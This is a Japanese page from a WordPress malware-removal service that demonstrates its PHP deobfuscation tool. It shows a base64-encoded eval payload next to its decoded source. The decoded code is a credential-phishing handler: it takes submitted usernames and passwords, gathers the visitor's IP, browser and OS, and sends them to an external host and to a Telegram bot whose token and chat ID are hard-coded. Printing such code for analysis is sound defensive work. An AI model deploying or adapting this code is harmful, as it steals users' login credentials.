Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php eval(base64_decode('CiBpZiAoZW1wdHkoJF9QT1NUWyJceDU1XHg3M1wxNDVcMTYyXHg2ZVwxNDFcMTU1XHg2NSJdKSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVx4NzJceDZlXHg2MVx4NmRceDY1Il0pID4gNTApIHsgJG5hbWVFcnIgPSAiXDQwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVw...



難読化されたPHPコード

<?php eval(base64_decode('CiBpZiAoZW1wdHkoJF9QT1NUWyJceDU1XHg3M1wxNDVcMTYyXHg2ZVwxNDFcMTU1XHg2NSJdKSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVx4NzJceDZlXHg2MVx4NmRceDY1Il0pID4gNTApIHsgJG5hbWVFcnIgPSAiXDQwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVwxNjJceDZlXDE0MVx4NmRcMTQ1Il0pIDwgMSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlIHsgJGlwID0gZ2V0ZW52KCJcMTIyXDEwNVx4NGRcMTE3XHg1NFwxMDVcMTM3XDEwMVwxMDRceDQ0XHg1MiIpOyAkcG9ydCA9ICRfU0VSVkVSWyJceDUyXHg0NVx4NGRceDRmXHg1NFwxMDVcMTM3XHg1MFwxMTdcMTIyXDEyNCJdOyAkaG9zdG5hbWUgPSBnZXRob3N0YnlhZGRyKCRpcCk7ICR1c2VyX2FnZW50ID0gJF9TRVJWRVJbIlwxMTBceDU0XHg1NFx4NTBceDVmXDEyNVx4NTNceDQ1XHg1MlwxMzdceDQxXHg0N1x4NDVceDRlXDEyNCJdOyBmdW5jdGlvbiBnZXRfYnJvd3Nlcl9uYW1lKCR1c2VyX2FnZW50KSB7IGlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTA2XHg2OVx4NzJcMTQ1XHg2Nlx4NmZceDc4IikgIT09IGZhbHNlKSB7IHJldHVybiAiXDEwNlwxNTFceDcyXHg2NVwxNDZcMTU3XDE3MCI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJceDQzXHg2OFwxNjJcMTU3XHg2ZFx4NjUiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDQzXDE1MFx4NzJcMTU3XDE1NVx4NjUiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyM1x4NjFceDY2XDE0MVx4NzJcMTUxIikgIT09IGZhbHNlKSB7IHJldHVybiAiXHg1M1x4NjFceDY2XHg2MVwxNjJcMTUxIjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMDVceDY0XHg2N1wxNDUiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDQ1XDE0NFx4NjdceDY1IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMTVceDUzXDExMVwxMDUiKSAhPT0gZmFsc2UgfHwgc3RycG9zKCR1c2VyX2FnZW50LCAiXHg1NFwxNjJceDY5XHg2NFwxNDVcMTU2XHg3NCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NDlceDZlXDE2NFx4NjVceDcyXHg2ZVwxNDVceDc0XDQwXDEwNVwxNzBceDcwXHg2Y1x4NmZceDcyXDE0NVwxNjIiOyB9IGVsc2UgeyByZXR1cm4gIlx4NTVceDZlXDE1M1wxNTZcMTU3XHg3N1wxNTYiOyB9IH0gZnVuY3Rpb24gZ2V0X29zKCR1c2VyX2FnZW50KSB7IGlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJceDU3XDE1MVx4NmVceDY0XDE1N1x4NzdceDczXDQwXHg0ZVwxMjRceDIwXDYxXDYwXDU2XHgzMCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NTdcMTUxXHg2ZVx4NjRceDZmXHg3N1x4NzNcNDBcNjFcNjAiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyN1wxNTFceDZlXDE0NFx4NmZceDc3XDE2M1w0MFx4NGVcMTI0XDQwXHgzNlx4MmVcNjMiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJcMTI3XHg2OVwxNTZcMTQ0XHg2ZlwxNjdceDczXDQwXDcwXHgyZVx4MzEiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyN1x4NjlcMTU2XHg2NFwxNTdcMTY3XHg3M1w0MFwxMTZcMTI0XDQwXHgzNlx4MmVcNjIiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDU3XHg2OVx4NmVcMTQ0XHg2Zlx4NzdcMTYzXDQwXHgzOCI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTI3XHg2OVx4NmVceDY0XDE1N1x4NzdcMTYzXDQwXDExNlwxMjRceDIwXDY2XHgyZVw2MSIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NTdcMTUxXHg2ZVx4NjRcMTU3XDE2N1x4NzNceDIwXDY3IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlx4NGRcMTQxXDE0M1x4NjlcMTU2XDE2NFwxNTdcMTYzXDE1MCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxMTVcMTQxXDE0M1x4MjBcMTE3XHg1MyI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTE0XHg2OVwxNTZcMTY1XDE3MCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxMTRcMTUxXDE1NlwxNjVcMTcwIjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMDFcMTU2XDE0NFwxNjJcMTU3XHg2OVwxNDQiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJcMTAxXHg2ZVwxNDRceDcyXDE1N1wxNTFceDY0IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlx4NjlcMTIwXDE1MFx4NmZceDZlXDE0NSIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxNTFcMTE3XHg1MyI7IH0gZWxzZSB7IHJldHVybiAiXHg1NVx4NmVceDZiXHg2ZVwxNTdceDc3XDE1NiI7IH0gfSAkYnJvd3NlciA9IGdldF9icm93c2VyX25hbWUoJHVzZXJfYWdlbnQpOyAkaW5mbyA9IGdldF9vcygkdXNlcl9hZ2VudCk7ICRVc2VybmFtZSA9ICRfUE9TVFsiXHg1NVx4NzNceDY1XDE2Mlx4NmVcMTQxXDE1NVwxNDUiXTsgJFBhc3N3b3JkID0gJF9QT1NUWyJceDUwXHg2MVwxNjNcMTYzXHg3N1wxNTdcMTYyXHg2NCJdOyAkZGF0YSA9IGFycmF5KCJcMTI1XDE2M1x4NjVceDcyXDE1Nlx4NjFcMTU1XHg2NSIgPT4gJFVzZXJuYW1lLCAiXHg1MFwxNDFcMTYzXDE2M1x4NzdceDZmXDE2MlwxNDQiID0+ICRQYXNzd29yZCk7ICR1cmwgPSAiXDE1MFx4NzRceDc0XDE2MFwxNjNcNzJceDJmXHgyZlx4MzVcNjNceDYxXDE0Mlx4MzFcNjJcNjNcNTZceDYxXDE0Mlx4MzFceDMyXHgzM1w3MFx4MzJcNjNcNjNcNjJceDJlXDcxXHgzNlx4MmVceDZjXDE2NFx4MmZcMTQ0XHg2OVx4NzNcMTYyXHg2NVw1NlwxNjBceDY4XHg3MCI7ICRvcHRpb25zID0gYXJyYXkoQ1VSTE9QVF9VUkwgPT4gJHVybCwgQ1VSTE9QVF9QT1NUID0+IDEsIENVUkxPUFRfUE9TVEZJRUxEUyA9PiBodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlKTsgJGN1cmwgPSBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHRfYXJyYXkoJGN1cmwsICRvcHRpb25zKTsgJHJlc3BvbnNlID0gY3VybF9leGVjKCRjdXJsKTsgY3VybF9jbG9zZSgkY3VybCk7ICRib3RUb2tlbiA9ICJcNjdcNjJcNjBcNzBcNjJcNjdcNjJcNjJcNjZceDMwXDcyXHg0MVx4NDFcMTEwXDE0N1wxMTdcMTU3XHg0NlwxMzdceDc1XHg2MlwxNDFceDU1XHg0Nlw2MlwxMTdceDMzXHg2OFwxNDVcMTcyXHg3M1x4NjZceDQ0XDE1MVwxNDFcMTYwXDcwXHgzNlx4NmVcMTE1XHg1M1x4MzRcMTYzXDE2MlwxNzBcMTE1IjsgJGNoYXRJZCA9ICJcNjZcNjZceDM5XHgzMVx4MzNcNjVcNjZceDMyXDY0XDYzIjsgJHVybCA9ICJcMTUwXDE2NFwxNjRceDcwXDE2M1x4M2FcNTdcNTdceDYxXHg3MFx4NjlcNTZcMTY0XHg2NVx4NmNcMTQ1XHg2N1x4NzJceDYxXHg2ZFx4MmVceDZmXDE2MlwxNDdcNTdcMTQyXDE1N1x4NzR7JGJvdFRva2VufVx4MmZcMTYzXDE0NVwxNTZceDY0XDExNVx4NjVceDczXHg3M1x4NjFcMTQ3XDE0NVx4M2ZceDYzXDE1MFx4NjFceDc0XHg1Zlx4NjlceDY0XDc1eyRjaGF0SWR9XHgyNlx4NzRceDY1XDE3MFwxNjRceDNkXDEyNVwxNjNceDY1XHg3MlwxNTZcMTQxXDE1NVwxNDVceDNhXDQweyRVc2VybmFtZX1cNDVceDMwXHg0MVwxMjBceDYxXDE2M1x4NzNceDc3XHg2Zlx4NzJcMTQ0XDcyXHgyMHskUGFzc3dvcmR9XHgyNVw2MFwxMDFceDQyXDE2MlwxNTdcMTY3XHg3M1wxNDVcMTYyXDcyXDQweyRicm93c2VyfVx4MjVcNjBceDQxXHg0ZlwxNjBceDY1XDE2MlwxNDFcMTY0XHg2OVx4NmVceDY3XHgyMFx4NzNcMTcxXDE2M1x4NzRceDY1XDE1NVx4M2FcNDB7JGluZm99XDQ1XHgzMFx4NDFcMTAzXHg2Y1wxNTFceDY1XHg2ZVx4NzRcNDBceDY5XDE2MFx4M2FcNDB7JGlwfVw0NVx4MzBceDQxXHgzZFx4M2RceDNkXDc1XHgzZFx4M2RcNzVcNzVceDNkXHgzZFx4M2RceDNkXDc1XHgyYlw0MFwxMzNcNDBceDQzXDE2Mlx4NjVceDYxXHg3NFx4NjVcMTQ0XDQwXDE0MlwxNzFcNDBcMTE3XDE1NVwxNDVceDQ3XHg2MVwxMTRcMTU3XHg3Mlx4NDRcNDBceDVkXDQwXHgyYlx4M2RceDNkXDc1XDc1XHgzZFx4M2RceDNkXHgzZFw3NVw3NVx4M2RceDNkXHgzZCI7ICRzdHJlYW1PcHRpb25zID0gYXJyYXkoIlx4NzNceDczXHg2YyIgPT4gYXJyYXkoIlx4NzZcMTQ1XHg3MlwxNTFceDY2XDE3MVwxMzdcMTYwXDE0NVwxNDVcMTYyIiA9PiBmYWxzZSwgIlx4NzZceDY1XHg3MlwxNTFceDY2XDE3MVx4NWZceDcwXDE0NVx4NjVcMTYyXDEzN1x4NmVceDYxXDE1NVwxNDUiID0+IGZhbHNlKSwgIlx4NjhcMTY0XDE2NFx4NzAiID0+IGFycmF5KCJceDZkXDE0NVx4NzRceDY4XHg2Zlx4NjQiID0+ICJcMTIwXDExN1x4NTNcMTI0IikpOyAkY29udGV4dCA9IHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkc3RyZWFtT3B0aW9ucyk7ICRoYW5kbGUgPSBmb3BlbigkdXJsLCAiXDE2MiIsIGZhbHNlLCAkY29udGV4dCk7ICRyZXNwb25zZSA9IHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSk7IGZjbG9zZSgkaGFuZGxlKTsgZWNobyAkcmVzcG9uc2U7IH0g'));



?>

デコード(難読化解除)されたコード

<?php

eval {
    if (empty($_POST["Username"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["Username"]) > 50) {
        $nameErr = " ";
    } elseif (strlen($_POST["Username"]) < 1) {
        $nameErr = " ";
    } else {
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $user_agent = $_SERVER["HTTP_USER_AGENT"];
        function get_browser_name($user_agent)
        {
            if (strpos($user_agent, "Firefox") !== false) {
                return "Firefox";
            } elseif (strpos($user_agent, "Chrome") !== false) {
                return "Chrome";
            } elseif (strpos($user_agent, "Safari") !== false) {
                return "Safari";
            } elseif (strpos($user_agent, "Edge") !== false) {
                return "Edge";
            } elseif (strpos($user_agent, "MSIE") !== false || strpos($user_agent, "Trident") !== false) {
                return "Internet Explorer";
            } else {
                return "Unknown";
            }
        }
        function get_os($user_agent)
        {
            if (strpos($user_agent, "Windows NT 10.0") !== false) {
                return "Windows 10";
            } elseif (strpos($user_agent, "Windows NT 6.3") !== false) {
                return "Windows 8.1";
            } elseif (strpos($user_agent, "Windows NT 6.2") !== false) {
                return "Windows 8";
            } elseif (strpos($user_agent, "Windows NT 6.1") !== false) {
                return "Windows 7";
            } elseif (strpos($user_agent, "Macintosh") !== false) {
                return "Mac OS";
            } elseif (strpos($user_agent, "Linux") !== false) {
                return "Linux";
            } elseif (strpos($user_agent, "Android") !== false) {
                return "Android";
            } elseif (strpos($user_agent, "iPhone") !== false) {
                return "iOS";
            } else {
                return "Unknown";
            }
        }
        $browser = get_browser_name($user_agent);
        $info = get_os($user_agent);
        $Username = $_POST["Username"];
        $Password = $_POST["Password"];
        $data = array("Username" => $Username, "Password" => $Password);
        $url = "https://53ab123.ab12382332.96.lt/disre.php";
        $options = array(CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true);
        $curl = curl_init();
        curl_setopt_array($curl, $options);
        $response = curl_exec($curl);
        curl_close($curl);
        $botToken = "7208272260:AAHgOoF_ubaUF2O3hezsfDiap86nMS4srxM";
        $chatId = "6691356243";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=Username: {$Username}%0APassword: {$Password}%0ABrowser: {$browser}%0AOperating system: {$info}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] +=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
};

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.